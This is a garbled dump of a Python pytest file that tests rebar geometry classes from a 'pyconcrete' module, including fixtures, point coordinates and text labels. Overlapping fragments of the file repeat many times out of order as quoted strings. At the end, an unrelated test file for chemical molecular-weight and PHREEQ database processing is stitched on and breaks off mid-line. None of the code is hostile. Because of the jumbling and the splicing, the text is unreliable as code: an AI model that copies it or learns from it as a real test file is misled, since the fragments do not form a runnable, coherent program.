lr1, ur1): # assert", "copy.deepcopy(r1) r_scale.scale(75, 20) assert r_scale.text_len == 'L=5' def test_xy_level(r1, lr1, ur1): assert r1.x1", "test_length(r1): assert r1.length == 5 def test_diameter(r1): assert r1.diameter == 20 def test_count(r1):", "ur1): assert r1.x1 == 0 assert r1.x2 == 5 assert r1.y == 0", "test_diameter_l(lr1): assert lr1.diameter == 20 def test_count_l(lr1): assert lr1.count == 2 def test_insert_l(lr1):", "20), (13.75, 20)] assert ur1.points_along() == [(50, 0), (100, 0), (150, 0)] def", "test_real_length(r1, lr1, ur1): # assert r1.real_length == 5 # assert lr1.real_length == 200", "r1.length == 5 def test_diameter(r1): assert r1.diameter == 20 def test_count(r1): assert r1.count", "lr1, ur1): assert r1.points_along() == [(1.25, 0), (2.5, 0), (3.75, 0)] assert lr1.points_along()", "assert ur1.x2 == 200 assert ur1.y == 0 assert lr1.x1 == 10 assert", "[(50, 0), (100, 0), (150, 0)] def test_text(r1, lr1, ur1): assert r1.text ==", "== 0 assert r1.x2 == 5 assert r1.y == 0 assert ur1.x1 ==", "r = rebar.LRebar( length=5, diameter=20, count=2, insert=(10, 20), v_align='top', h_align='left') return r @pytest.fixture", "(10, 20), (15, 20)] assert lr1.points() == pts def test_points_u(ur1): pts = [(0,", "r1.x2 == 5 assert r1.y == 0 assert ur1.x1 == 0 assert ur1.x2", "v_align='bot') return r def test_length(r1): assert r1.length == 5 def test_diameter(r1): assert r1.diameter", "'L=5' def test_xy_level(r1, lr1, ur1): assert r1.x1 == 0 assert r1.x2 == 5", "r_scale.text_len == 'L=5' def test_xy_level(r1, lr1, ur1): assert r1.x1 == 0 assert r1.x2", "import pytest import copy from pyconcrete import rebar @pytest.fixture def r1(): r =", "r1.points_along() == [(1.25, 0), (2.5, 0), (3.75, 0)] assert lr1.points_along() == [(11.25, 20),", "0), (3.75, 0)] assert lr1.points_along() == [(11.25, 20), (12.5, 20), (13.75, 20)] assert", "ur1.points_along() == [(50, 0), (100, 0), (150, 0)] def test_text(r1, lr1, ur1): assert", "ur1): assert r1.text_len == 'L=5' assert ur1.text_len == 'L=200' r_scale = copy.deepcopy(r1) r_scale.scale(75,", "= [(0, 6), (0, 0), (200, 0), (200, 6)] assert ur1.points() == pts", "== 20 def test_count_l(lr1): assert lr1.count == 2 def test_insert_l(lr1): assert lr1.insert ==", "(13.75, 20)] assert ur1.points_along() == [(50, 0), (100, 0), (150, 0)] def test_text(r1,", "lr1.text == '2~20' assert ur1.text == '4~16' def test_text_len(r1, ur1): assert r1.text_len ==", "lr1, ur1): assert r1.text == '1~20' assert lr1.text == '2~20' assert ur1.text ==", "lr1, ur1): # assert r1.real_length == 5 # assert lr1.real_length == 200 #", "20 def test_count_l(lr1): assert lr1.count == 2 def test_insert_l(lr1): assert lr1.insert == (10,", "0), (200, 0), (200, 6)] assert ur1.points() == pts def test_points_along(r1, lr1, ur1):", "count=2, insert=(10, 20), v_align='top', h_align='left') return r @pytest.fixture def ur1(): r = rebar.URebar(", "2 def test_insert_l(lr1): assert lr1.insert == (10, 20) def test_points_l(lr1): pts = [(10,", "test_insert_l(lr1): assert lr1.insert == (10, 20) def test_points_l(lr1): pts = [(10, 14), (10,", "assert ur1.x1 == 0 assert ur1.x2 == 200 assert ur1.y == 0 assert", "return r @pytest.fixture def ur1(): r = rebar.URebar( length=200, diameter=16, count=4, insert=(0, 0),", "assert lr1.points_along() == [(11.25, 20), (12.5, 20), (13.75, 20)] assert ur1.points_along() == [(50,", "def lr1(): r = rebar.LRebar( length=5, diameter=20, count=2, insert=(10, 20), v_align='top', h_align='left') return", "== [(50, 0), (100, 0), (150, 0)] def test_text(r1, lr1, ur1): assert r1.text", "= [(10, 14), (10, 20), (15, 20)] assert lr1.points() == pts def test_points_u(ur1):", "import rebar @pytest.fixture def r1(): r = rebar.Rebar( length=5, diameter=20, count=1, insert=(0, 0))", "assert r1.points() == pts def test_length_L(lr1): assert lr1.length == 5 def test_diameter_l(lr1): assert", "20), (15, 20)] assert lr1.points() == pts def test_points_u(ur1): pts = [(0, 6),", "[(0, 6), (0, 0), (200, 0), (200, 6)] assert ur1.points() == pts def", "20)] assert ur1.points_along() == [(50, 0), (100, 0), (150, 0)] def test_text(r1, lr1,", "assert lr1.count == 2 def test_insert_l(lr1): assert lr1.insert == (10, 20) def test_points_l(lr1):", "test_count_l(lr1): assert lr1.count == 2 def test_insert_l(lr1): assert lr1.insert == (10, 20) def", "0)] assert r1.points() == pts def test_length_L(lr1): assert lr1.length == 5 def test_diameter_l(lr1):", "assert lr1.insert == (10, 20) def test_points_l(lr1): pts = [(10, 14), (10, 20),", "20) assert r_scale.text_len == 'L=5' def test_xy_level(r1, lr1, ur1): assert r1.x1 == 0", "def test_diameter(r1): assert r1.diameter == 20 def test_count(r1): assert r1.count == 1 def", "v_align='top', h_align='left') return r @pytest.fixture def ur1(): r = rebar.URebar( length=200, diameter=16, count=4,", "ur1): # assert r1.real_length == 5 # assert lr1.real_length == 200 # assert", "diameter=16, count=4, insert=(0, 0), v_align='bot') return r def test_length(r1): assert r1.length == 5", "0)] assert lr1.points_along() == [(11.25, 20), (12.5, 20), (13.75, 20)] assert ur1.points_along() ==", "lr1.insert == (10, 20) def test_points_l(lr1): pts = [(10, 14), (10, 20), (15,", "length=5, diameter=20, count=1, insert=(0, 0)) return r @pytest.fixture def lr1(): r = rebar.LRebar(", "assert lr1.diameter == 20 def test_count_l(lr1): assert lr1.count == 2 def test_insert_l(lr1): assert", "assert r1.text_len == 'L=5' assert ur1.text_len == 'L=200' r_scale = copy.deepcopy(r1) r_scale.scale(75, 20)", "def test_text_len(r1, ur1): assert r1.text_len == 'L=5' assert ur1.text_len == 'L=200' r_scale =", "@pytest.fixture def lr1(): r = rebar.LRebar( length=5, diameter=20, count=2, insert=(10, 20), v_align='top', h_align='left')", "r1.insert == (0, 0) def test_points(r1): pts = [(0, 0), (5, 0)] assert", "1 def test_insert(r1): assert r1.insert == (0, 0) def test_points(r1): pts = [(0,", "= rebar.LRebar( length=5, diameter=20, count=2, insert=(10, 20), v_align='top', h_align='left') return r @pytest.fixture def", "0 assert r1.x2 == 5 assert r1.y == 0 assert ur1.x1 == 0", "rebar.LRebar( length=5, diameter=20, count=2, insert=(10, 20), v_align='top', h_align='left') return r @pytest.fixture def ur1():", "0) def test_points(r1): pts = [(0, 0), (5, 0)] assert r1.points() == pts", "'4~16' def test_text_len(r1, ur1): assert r1.text_len == 'L=5' assert ur1.text_len == 'L=200' r_scale", "assert r1.insert == (0, 0) def test_points(r1): pts = [(0, 0), (5, 0)]", "def test_xy_level(r1, lr1, ur1): assert r1.x1 == 0 assert r1.x2 == 5 assert", "== 'L=5' def test_xy_level(r1, lr1, ur1): assert r1.x1 == 0 assert r1.x2 ==", "# assert r1.real_length == 5 # assert lr1.real_length == 200 # assert ur1.real_length", "20) def test_points_l(lr1): pts = [(10, 14), (10, 20), (15, 20)] assert lr1.points()", "assert r1.real_length == 5 # assert lr1.real_length == 200 # assert ur1.real_length ==", "return r @pytest.fixture def lr1(): r = rebar.LRebar( length=5, diameter=20, count=2, insert=(10, 20),", "assert lr1.x1 == 10 assert lr1.x2 == 15 assert lr1.y == 20 #", "(12.5, 20), (13.75, 20)] assert ur1.points_along() == [(50, 0), (100, 0), (150, 0)]", "0 assert lr1.x1 == 10 assert lr1.x2 == 15 assert lr1.y == 20", "== (0, 0) def test_points(r1): pts = [(0, 0), (5, 0)] assert r1.points()", "test_count(r1): assert r1.count == 1 def test_insert(r1): assert r1.insert == (0, 0) def", "def r1(): r = rebar.Rebar( length=5, diameter=20, count=1, insert=(0, 0)) return r @pytest.fixture", "lr1.points_along() == [(11.25, 20), (12.5, 20), (13.75, 20)] assert ur1.points_along() == [(50, 0),", "length=5, diameter=20, count=2, insert=(10, 20), v_align='top', h_align='left') return r @pytest.fixture def ur1(): r", "ur1.points() == pts def test_points_along(r1, lr1, ur1): assert r1.points_along() == [(1.25, 0), (2.5,", "assert lr1.points() == pts def test_points_u(ur1): pts = [(0, 6), (0, 0), (200,", "def test_points_along(r1, lr1, ur1): assert r1.points_along() == [(1.25, 0), (2.5, 0), (3.75, 0)]", "0), (150, 0)] def test_text(r1, lr1, ur1): assert r1.text == '1~20' assert lr1.text", "== 10 assert lr1.x2 == 15 assert lr1.y == 20 # def test_real_length(r1,", "# def test_real_length(r1, lr1, ur1): # assert r1.real_length == 5 # assert lr1.real_length", "r1.count == 1 def test_insert(r1): assert r1.insert == (0, 0) def test_points(r1): pts", "diameter=20, count=1, insert=(0, 0)) return r @pytest.fixture def lr1(): r = rebar.LRebar( length=5,", "def test_length(r1): assert r1.length == 5 def test_diameter(r1): assert r1.diameter == 20 def", "rebar.Rebar( length=5, diameter=20, count=1, insert=(0, 0)) return r @pytest.fixture def lr1(): r =", "== 0 assert ur1.x2 == 200 assert ur1.y == 0 assert lr1.x1 ==", "0 assert ur1.x1 == 0 assert ur1.x2 == 200 assert ur1.y == 0", "r1.points() == pts def test_length_L(lr1): assert lr1.length == 5 def test_diameter_l(lr1): assert lr1.diameter", "== pts def test_length_L(lr1): assert lr1.length == 5 def test_diameter_l(lr1): assert lr1.diameter ==", "5 assert r1.y == 0 assert ur1.x1 == 0 assert ur1.x2 == 200", "r1.real_length == 5 # assert lr1.real_length == 200 # assert ur1.real_length == 250", "def test_points_u(ur1): pts = [(0, 6), (0, 0), (200, 0), (200, 6)] assert", "ur1.text == '4~16' def test_text_len(r1, ur1): assert r1.text_len == 'L=5' assert ur1.text_len ==", "r1(): r = rebar.Rebar( length=5, diameter=20, count=1, insert=(0, 0)) return r @pytest.fixture def", "0), (2.5, 0), (3.75, 0)] assert lr1.points_along() == [(11.25, 20), (12.5, 20), (13.75,", "assert r1.diameter == 20 def test_count(r1): assert r1.count == 1 def test_insert(r1): assert", "def test_real_length(r1, lr1, ur1): # assert r1.real_length == 5 # assert lr1.real_length ==", "== 5 def test_diameter_l(lr1): assert lr1.diameter == 20 def test_count_l(lr1): assert lr1.count ==", "ur1.x1 == 0 assert ur1.x2 == 200 assert ur1.y == 0 assert lr1.x1", "== [(1.25, 0), (2.5, 0), (3.75, 0)] assert lr1.points_along() == [(11.25, 20), (12.5,", "assert ur1.text == '4~16' def test_text_len(r1, ur1): assert r1.text_len == 'L=5' assert ur1.text_len", "== (10, 20) def test_points_l(lr1): pts = [(10, 14), (10, 20), (15, 20)]", "assert r_scale.text_len == 'L=5' def test_xy_level(r1, lr1, ur1): assert r1.x1 == 0 assert", "(200, 6)] assert ur1.points() == pts def test_points_along(r1, lr1, ur1): assert r1.points_along() ==", "== 200 assert ur1.y == 0 assert lr1.x1 == 10 assert lr1.x2 ==", "ur1): assert r1.points_along() == [(1.25, 0), (2.5, 0), (3.75, 0)] assert lr1.points_along() ==", "lr1.y == 20 # def test_real_length(r1, lr1, ur1): # assert r1.real_length == 5", "20)] assert lr1.points() == pts def test_points_u(ur1): pts = [(0, 6), (0, 0),", "pts = [(10, 14), (10, 20), (15, 20)] assert lr1.points() == pts def", "test_insert(r1): assert r1.insert == (0, 0) def test_points(r1): pts = [(0, 0), (5,", "r = rebar.Rebar( length=5, diameter=20, count=1, insert=(0, 0)) return r @pytest.fixture def lr1():", "200 assert ur1.y == 0 assert lr1.x1 == 10 assert lr1.x2 == 15", "length=200, diameter=16, count=4, insert=(0, 0), v_align='bot') return r def test_length(r1): assert r1.length ==", "ur1.text_len == 'L=200' r_scale = copy.deepcopy(r1) r_scale.scale(75, 20) assert r_scale.text_len == 'L=5' def", "<gh_stars>10-100 import pytest import copy from pyconcrete import rebar @pytest.fixture def r1(): r", "0), (100, 0), (150, 0)] def test_text(r1, lr1, ur1): assert r1.text == '1~20'", "0)] def test_text(r1, lr1, ur1): assert r1.text == '1~20' assert lr1.text == '2~20'", "== 0 assert lr1.x1 == 10 assert lr1.x2 == 15 assert lr1.y ==", "count=1, insert=(0, 0)) return r @pytest.fixture def lr1(): r = rebar.LRebar( length=5, diameter=20,", "def test_diameter_l(lr1): assert lr1.diameter == 20 def test_count_l(lr1): assert lr1.count == 2 def", "lr1.x1 == 10 assert lr1.x2 == 15 assert lr1.y == 20 # def", "= [(0, 0), (5, 0)] assert r1.points() == pts def test_length_L(lr1): assert lr1.length", "pts = [(0, 0), (5, 0)] assert r1.points() == pts def test_length_L(lr1): assert", "def ur1(): r = rebar.URebar( length=200, diameter=16, count=4, insert=(0, 0), v_align='bot') return r", "6)] assert ur1.points() == pts def test_points_along(r1, lr1, ur1): assert r1.points_along() == [(1.25,", "test_points_along(r1, lr1, ur1): assert r1.points_along() == [(1.25, 0), (2.5, 0), (3.75, 0)] assert", "[(1.25, 0), (2.5, 0), (3.75, 0)] assert lr1.points_along() == [(11.25, 20), (12.5, 20),", "pts = [(0, 6), (0, 0), (200, 0), (200, 6)] assert ur1.points() ==", "assert ur1.y == 0 assert lr1.x1 == 10 assert lr1.x2 == 15 assert", "assert lr1.x2 == 15 assert lr1.y == 20 # def test_real_length(r1, lr1, ur1):", "r1.diameter == 20 def test_count(r1): assert r1.count == 1 def test_insert(r1): assert r1.insert", "r @pytest.fixture def ur1(): r = rebar.URebar( length=200, diameter=16, count=4, insert=(0, 0), v_align='bot')", "== 1 def test_insert(r1): assert r1.insert == (0, 0) def test_points(r1): pts =", "(0, 0) def test_points(r1): pts = [(0, 0), (5, 0)] assert r1.points() ==", "r1.text_len == 'L=5' assert ur1.text_len == 'L=200' r_scale = copy.deepcopy(r1) r_scale.scale(75, 20) assert", "(150, 0)] def test_text(r1, lr1, ur1): assert r1.text == '1~20' assert lr1.text ==", "== 2 def test_insert_l(lr1): assert lr1.insert == (10, 20) def test_points_l(lr1): pts =", "pts def test_length_L(lr1): assert lr1.length == 5 def test_diameter_l(lr1): assert lr1.diameter == 20", "== 5 assert r1.y == 0 assert ur1.x1 == 0 assert ur1.x2 ==", "lr1.points() == pts def test_points_u(ur1): pts = [(0, 6), (0, 0), (200, 0),", "= rebar.URebar( length=200, diameter=16, count=4, insert=(0, 0), v_align='bot') return r def test_length(r1): assert", "insert=(10, 20), v_align='top', h_align='left') return r @pytest.fixture def ur1(): r = rebar.URebar( length=200,", "6), (0, 0), (200, 0), (200, 6)] assert ur1.points() == pts def test_points_along(r1,", "def test_insert_l(lr1): assert lr1.insert == (10, 20) def test_points_l(lr1): pts = [(10, 14),", "(0, 0), (200, 0), (200, 6)] assert ur1.points() == pts def test_points_along(r1, lr1,", "test_text_len(r1, ur1): assert r1.text_len == 'L=5' assert ur1.text_len == 'L=200' r_scale = copy.deepcopy(r1)", "test_xy_level(r1, lr1, ur1): assert r1.x1 == 0 assert r1.x2 == 5 assert r1.y", "r1.text == '1~20' assert lr1.text == '2~20' assert ur1.text == '4~16' def test_text_len(r1,", "return r def test_length(r1): assert r1.length == 5 def test_diameter(r1): assert r1.diameter ==", "14), (10, 20), (15, 20)] assert lr1.points() == pts def test_points_u(ur1): pts =", "(3.75, 0)] assert lr1.points_along() == [(11.25, 20), (12.5, 20), (13.75, 20)] assert ur1.points_along()", "test_points_u(ur1): pts = [(0, 6), (0, 0), (200, 0), (200, 6)] assert ur1.points()", "assert lr1.text == '2~20' assert ur1.text == '4~16' def test_text_len(r1, ur1): assert r1.text_len", "def test_length_L(lr1): assert lr1.length == 5 def test_diameter_l(lr1): assert lr1.diameter == 20 def", "(10, 20) def test_points_l(lr1): pts = [(10, 14), (10, 20), (15, 20)] assert", "(200, 0), (200, 6)] assert ur1.points() == pts def test_points_along(r1, lr1, ur1): assert", "test_text(r1, lr1, ur1): assert r1.text == '1~20' assert lr1.text == '2~20' assert ur1.text", "assert r1.points_along() == [(1.25, 0), (2.5, 0), (3.75, 0)] assert lr1.points_along() == [(11.25,", "= rebar.Rebar( length=5, diameter=20, count=1, insert=(0, 0)) return r @pytest.fixture def lr1(): r", "0), (200, 6)] assert ur1.points() == pts def test_points_along(r1, lr1, ur1): assert r1.points_along()", "r_scale.scale(75, 20) assert r_scale.text_len == 'L=5' def test_xy_level(r1, lr1, ur1): assert r1.x1 ==", "== [(11.25, 20), (12.5, 20), (13.75, 20)] assert ur1.points_along() == [(50, 0), (100,", "(15, 20)] assert lr1.points() == pts def test_points_u(ur1): pts = [(0, 6), (0,", "def test_count(r1): assert r1.count == 1 def test_insert(r1): assert r1.insert == (0, 0)", "[(10, 14), (10, 20), (15, 20)] assert lr1.points() == pts def test_points_u(ur1): pts", "(100, 0), (150, 0)] def test_text(r1, lr1, ur1): assert r1.text == '1~20' assert", "15 assert lr1.y == 20 # def test_real_length(r1, lr1, ur1): # assert r1.real_length", "20), (12.5, 20), (13.75, 20)] assert ur1.points_along() == [(50, 0), (100, 0), (150,", "assert ur1.points() == pts def test_points_along(r1, lr1, ur1): assert r1.points_along() == [(1.25, 0),", "r def test_length(r1): assert r1.length == 5 def test_diameter(r1): assert r1.diameter == 20", "ur1.x2 == 200 assert ur1.y == 0 assert lr1.x1 == 10 assert lr1.x2", "== pts def test_points_u(ur1): pts = [(0, 6), (0, 0), (200, 0), (200,", "def test_count_l(lr1): assert lr1.count == 2 def test_insert_l(lr1): assert lr1.insert == (10, 20)", "20 # def test_real_length(r1, lr1, ur1): # assert r1.real_length == 5 # assert", "== 5 def test_diameter(r1): assert r1.diameter == 20 def test_count(r1): assert r1.count ==", "r1.x1 == 0 assert r1.x2 == 5 assert r1.y == 0 assert ur1.x1", "h_align='left') return r @pytest.fixture def ur1(): r = rebar.URebar( length=200, diameter=16, count=4, insert=(0,", "5 def test_diameter(r1): assert r1.diameter == 20 def test_count(r1): assert r1.count == 1", "insert=(0, 0)) return r @pytest.fixture def lr1(): r = rebar.LRebar( length=5, diameter=20, count=2,", "[(11.25, 20), (12.5, 20), (13.75, 20)] assert ur1.points_along() == [(50, 0), (100, 0),", "assert r1.x2 == 5 assert r1.y == 0 assert ur1.x1 == 0 assert", "r @pytest.fixture def lr1(): r = rebar.LRebar( length=5, diameter=20, count=2, insert=(10, 20), v_align='top',", "r1.y == 0 assert ur1.x1 == 0 assert ur1.x2 == 200 assert ur1.y", "assert r1.x1 == 0 assert r1.x2 == 5 assert r1.y == 0 assert", "test_points(r1): pts = [(0, 0), (5, 0)] assert r1.points() == pts def test_length_L(lr1):", "test_diameter(r1): assert r1.diameter == 20 def test_count(r1): assert r1.count == 1 def test_insert(r1):", "'2~20' assert ur1.text == '4~16' def test_text_len(r1, ur1): assert r1.text_len == 'L=5' assert", "assert ur1.points_along() == [(50, 0), (100, 0), (150, 0)] def test_text(r1, lr1, ur1):", "import copy from pyconcrete import rebar @pytest.fixture def r1(): r = rebar.Rebar( length=5,", "test_points_l(lr1): pts = [(10, 14), (10, 20), (15, 20)] assert lr1.points() == pts", "(2.5, 0), (3.75, 0)] assert lr1.points_along() == [(11.25, 20), (12.5, 20), (13.75, 20)]", "pts def test_points_u(ur1): pts = [(0, 6), (0, 0), (200, 0), (200, 6)]", "== 'L=5' assert ur1.text_len == 'L=200' r_scale = copy.deepcopy(r1) r_scale.scale(75, 20) assert r_scale.text_len", "'L=5' assert ur1.text_len == 'L=200' r_scale = copy.deepcopy(r1) r_scale.scale(75, 20) assert r_scale.text_len ==", "assert r1.length == 5 def test_diameter(r1): assert r1.diameter == 20 def test_count(r1): assert", "insert=(0, 0), v_align='bot') return r def test_length(r1): assert r1.length == 5 def test_diameter(r1):", "0 assert ur1.x2 == 200 assert ur1.y == 0 assert lr1.x1 == 10", "== 20 # def test_real_length(r1, lr1, ur1): # assert r1.real_length == 5 #", "== 20 def test_count(r1): assert r1.count == 1 def test_insert(r1): assert r1.insert ==", "assert r1.count == 1 def test_insert(r1): assert r1.insert == (0, 0) def test_points(r1):", "== '1~20' assert lr1.text == '2~20' assert ur1.text == '4~16' def test_text_len(r1, ur1):", "ur1): assert r1.text == '1~20' assert lr1.text == '2~20' assert ur1.text == '4~16'", "r_scale = copy.deepcopy(r1) r_scale.scale(75, 20) assert r_scale.text_len == 'L=5' def test_xy_level(r1, lr1, ur1):", "'1~20' assert lr1.text == '2~20' assert ur1.text == '4~16' def test_text_len(r1, ur1): assert", "lr1.count == 2 def test_insert_l(lr1): assert lr1.insert == (10, 20) def test_points_l(lr1): pts", "0)) return r @pytest.fixture def lr1(): r = rebar.LRebar( length=5, diameter=20, count=2, insert=(10,", "rebar.URebar( length=200, diameter=16, count=4, insert=(0, 0), v_align='bot') return r def test_length(r1): assert r1.length", "diameter=20, count=2, insert=(10, 20), v_align='top', h_align='left') return r @pytest.fixture def ur1(): r =", "count=4, insert=(0, 0), v_align='bot') return r def test_length(r1): assert r1.length == 5 def", "(5, 0)] assert r1.points() == pts def test_length_L(lr1): assert lr1.length == 5 def", "== '2~20' assert ur1.text == '4~16' def test_text_len(r1, ur1): assert r1.text_len == 'L=5'", "== 'L=200' r_scale = copy.deepcopy(r1) r_scale.scale(75, 20) assert r_scale.text_len == 'L=5' def test_xy_level(r1,", "lr1, ur1): assert r1.x1 == 0 assert r1.x2 == 5 assert r1.y ==", "def test_text(r1, lr1, ur1): assert r1.text == '1~20' assert lr1.text == '2~20' assert", "assert lr1.y == 20 # def test_real_length(r1, lr1, ur1): # assert r1.real_length ==", "copy from pyconcrete import rebar @pytest.fixture def r1(): r = rebar.Rebar( length=5, diameter=20,", "test_length_L(lr1): assert lr1.length == 5 def test_diameter_l(lr1): assert lr1.diameter == 20 def test_count_l(lr1):", "5 def test_diameter_l(lr1): assert lr1.diameter == 20 def test_count_l(lr1): assert lr1.count == 2", "pts def test_points_along(r1, lr1, ur1): assert r1.points_along() == [(1.25, 0), (2.5, 0), (3.75,", "def test_insert(r1): assert r1.insert == (0, 0) def test_points(r1): pts = [(0, 0),", "@pytest.fixture def ur1(): r = rebar.URebar( length=200, diameter=16, count=4, insert=(0, 0), v_align='bot') return", "20), v_align='top', h_align='left') return r @pytest.fixture def ur1(): r = rebar.URebar( length=200, diameter=16,", "== pts def test_points_along(r1, lr1, ur1): assert r1.points_along() == [(1.25, 0), (2.5, 0),", "pyconcrete import rebar @pytest.fixture def r1(): r = rebar.Rebar( length=5, diameter=20, count=1, insert=(0,", "0), v_align='bot') return r def test_length(r1): assert r1.length == 5 def test_diameter(r1): assert", "ur1(): r = rebar.URebar( length=200, diameter=16, count=4, insert=(0, 0), v_align='bot') return r def", "== '4~16' def test_text_len(r1, ur1): assert r1.text_len == 'L=5' assert ur1.text_len == 'L=200'", "lr1(): r = rebar.LRebar( length=5, diameter=20, count=2, insert=(10, 20), v_align='top', h_align='left') return r", "assert r1.y == 0 assert ur1.x1 == 0 assert ur1.x2 == 200 assert", "20 def test_count(r1): assert r1.count == 1 def test_insert(r1): assert r1.insert == (0,", "== 0 assert ur1.x1 == 0 assert ur1.x2 == 200 assert ur1.y ==", "lr1.x2 == 15 assert lr1.y == 20 # def test_real_length(r1, lr1, ur1): #", "'L=200' r_scale = copy.deepcopy(r1) r_scale.scale(75, 20) assert r_scale.text_len == 'L=5' def test_xy_level(r1, lr1,", "lr1.length == 5 def test_diameter_l(lr1): assert lr1.diameter == 20 def test_count_l(lr1): assert lr1.count", "@pytest.fixture def r1(): r = rebar.Rebar( length=5, diameter=20, count=1, insert=(0, 0)) return r", "[(0, 0), (5, 0)] assert r1.points() == pts def test_length_L(lr1): assert lr1.length ==", "def test_points_l(lr1): pts = [(10, 14), (10, 20), (15, 20)] assert lr1.points() ==", "pytest import copy from pyconcrete import rebar @pytest.fixture def r1(): r = rebar.Rebar(", "= copy.deepcopy(r1) r_scale.scale(75, 20) assert r_scale.text_len == 'L=5' def test_xy_level(r1, lr1, ur1): assert" ]
[ "162.7, 'Na2.43Cl(Ca(OH)2)1.2':180.2, 'Na2.43Cl:2H2O': 127.3, 'Na2.43Cl2.5:2H2O': 180.5, 'CaCl2:(MgCl2)2:12H2O': 517.6, 'Na2SO4:3K2SO4': 664.8, 'K2SO4:CaSO4:H2O': 328.4, 'Na.96Al.96Si2.04O6:H2O", "chem_mw.final, chem_mw.end, phreeq_db.verbose]: assert type(TF) is bool rmtree(phreeq_db.output_path) def test_accuracy(): # calculate the", "import the class modules chem_mw = chemw.ChemMW() phreeq_db = chemw.PHREEQdb() print(os.getcwd()) for TF", "phreeq_databases: print('\\n\\n\\n', re.search('([A-Za-z0-9_\\.]+(?=\\.dat))',db).group(), 'database\\n', '='*len(db)) phreeq_db.process(db) # verify the output folder and its", "os.path.exists(os.path.join(phreeq_db.output_path, json_name)) assert type(phreeq_db.db_name) is str assert type(phreeq_db.db) is DataFrame # delete the", "isclose(chem_mw.raw_mw, test_chemicals[chemical], rel_tol = tolerance): assert False else: assert True # affirm that", "modules chem_mw = chemw.ChemMW() phreeq_db = chemw.PHREEQdb() print(os.getcwd()) for TF in [chem_mw.verbose, chem_mw.final,", "180.5, 'CaCl2:(MgCl2)2:12H2O': 517.6, 'Na2SO4:3K2SO4': 664.8, 'K2SO4:CaSO4:H2O': 328.4, 'Na.96Al.96Si2.04O6:H2O ': 219.2, 'Ca1.019Na.136K.006Al2.18Si6.82O18:7.33H2O': 714.4 }", "of known MW test_chemicals = { 'Na2.43_Cl_(OH)2_(OH)1.2_(OH)': 162.7, 'Na2.43Cl(Ca(OH)2)1.2':180.2, 'Na2.43Cl:2H2O': 127.3, 'Na2.43Cl2.5:2H2O': 180.5,", "os def test_inits(): # import the class modules chem_mw = chemw.ChemMW() phreeq_db =", "in phreeq_databases: print('\\n\\n\\n', re.search('([A-Za-z0-9_\\.]+(?=\\.dat))',db).group(), 'database\\n', '='*len(db)) phreeq_db.process(db) # verify the output folder and", "test_accuracy(): # calculate the MW for chemicals of known MW test_chemicals = {", "= os.path.join(os.path.dirname(__file__), 'PHREEQqb') phreeq_db = chemw.PHREEQdb() for db in phreeq_databases: print('\\n\\n\\n', re.search('([A-Za-z0-9_\\.]+(?=\\.dat))',db).group(), 'database\\n',", "class modules chem_mw = chemw.ChemMW() phreeq_db = chemw.PHREEQdb() print(os.getcwd()) for TF in [chem_mw.verbose,", "import DataFrame from shutil import rmtree from math import isclose from glob import", "False else: assert True # affirm that iterated entities are zero for zero", "chemical in test_chemicals: chem_mw.mass(chemical) tolerance = chem_mw.mw*0.001 # 99.9% accuracy if not isclose(chem_mw.raw_mw,", "type(TF) is bool rmtree(phreeq_db.output_path) def test_accuracy(): # calculate the MW for chemicals of", "are zero for zero in [chem_mw.groups, chem_mw.layer, chem_mw.skip_characters]: assert zero == 0 def", "MW for chemicals of known MW test_chemicals = { 'Na2.43_Cl_(OH)2_(OH)1.2_(OH)': 162.7, 'Na2.43Cl(Ca(OH)2)1.2':180.2, 'Na2.43Cl:2H2O':", "from pandas import DataFrame from shutil import rmtree from math import isclose from", "math import isclose from glob import glob import chemw import re, os def", "the MW for chemicals of known MW test_chemicals = { 'Na2.43_Cl_(OH)2_(OH)1.2_(OH)': 162.7, 'Na2.43Cl(Ca(OH)2)1.2':180.2,", "json_name = re.search('([A-Za-z0-9_\\.]+(?=\\.dat))', db).group()+'.json' assert os.path.exists(os.path.join(phreeq_db.output_path, json_name)) assert type(phreeq_db.db_name) is str assert type(phreeq_db.db)", "entities are zero for zero in [chem_mw.groups, chem_mw.layer, chem_mw.skip_characters]: assert zero == 0", "assert os.path.exists(os.path.join(phreeq_db.output_path, json_name)) assert type(phreeq_db.db_name) is str assert type(phreeq_db.db) is DataFrame # delete", "'PHREEQqb') phreeq_db = chemw.PHREEQdb() for db in phreeq_databases: print('\\n\\n\\n', re.search('([A-Za-z0-9_\\.]+(?=\\.dat))',db).group(), 'database\\n', '='*len(db)) phreeq_db.process(db)", "import isclose from glob import glob import chemw import re, os def test_inits():", "== 0 def test_phreeq_db(): # process the PHREEQ databases phreeq_databases = [db for", "accuracy if not isclose(chem_mw.raw_mw, test_chemicals[chemical], rel_tol = tolerance): assert False else: assert True", "test_chemicals[chemical], rel_tol = tolerance): assert False else: assert True # affirm that iterated", "test_phreeq_db(): # process the PHREEQ databases phreeq_databases = [db for db in glob('databases/*.dat')]", "is bool rmtree(phreeq_db.output_path) def test_accuracy(): # calculate the MW for chemicals of known", "zero for zero in [chem_mw.groups, chem_mw.layer, chem_mw.skip_characters]: assert zero == 0 def test_phreeq_db():", "} # calculate the MW for the dictionary of chemicals chem_mw = chemw.ChemMW()", "db in phreeq_databases: print('\\n\\n\\n', re.search('([A-Za-z0-9_\\.]+(?=\\.dat))',db).group(), 'database\\n', '='*len(db)) phreeq_db.process(db) # verify the output folder", "'Ca1.019Na.136K.006Al2.18Si6.82O18:7.33H2O': 714.4 } # calculate the MW for the dictionary of chemicals chem_mw", "phreeq_databases: json_name = re.search('([A-Za-z0-9_\\.]+(?=\\.dat))', db).group()+'.json' assert os.path.exists(os.path.join(phreeq_db.output_path, json_name)) assert type(phreeq_db.db_name) is str assert", "in glob('databases/*.dat')] # output_path = os.path.join(os.path.dirname(__file__), 'PHREEQqb') phreeq_db = chemw.PHREEQdb() for db in", "process the PHREEQ databases phreeq_databases = [db for db in glob('databases/*.dat')] # output_path", "and its contents for db in phreeq_databases: json_name = re.search('([A-Za-z0-9_\\.]+(?=\\.dat))', db).group()+'.json' assert os.path.exists(os.path.join(phreeq_db.output_path,", "affirm that iterated entities are zero for zero in [chem_mw.groups, chem_mw.layer, chem_mw.skip_characters]: assert", "'Na2.43Cl:2H2O': 127.3, 'Na2.43Cl2.5:2H2O': 180.5, 'CaCl2:(MgCl2)2:12H2O': 517.6, 'Na2SO4:3K2SO4': 664.8, 'K2SO4:CaSO4:H2O': 328.4, 'Na.96Al.96Si2.04O6:H2O ': 219.2,", "219.2, 'Ca1.019Na.136K.006Al2.18Si6.82O18:7.33H2O': 714.4 } # calculate the MW for the dictionary of chemicals", "contents for db in phreeq_databases: json_name = 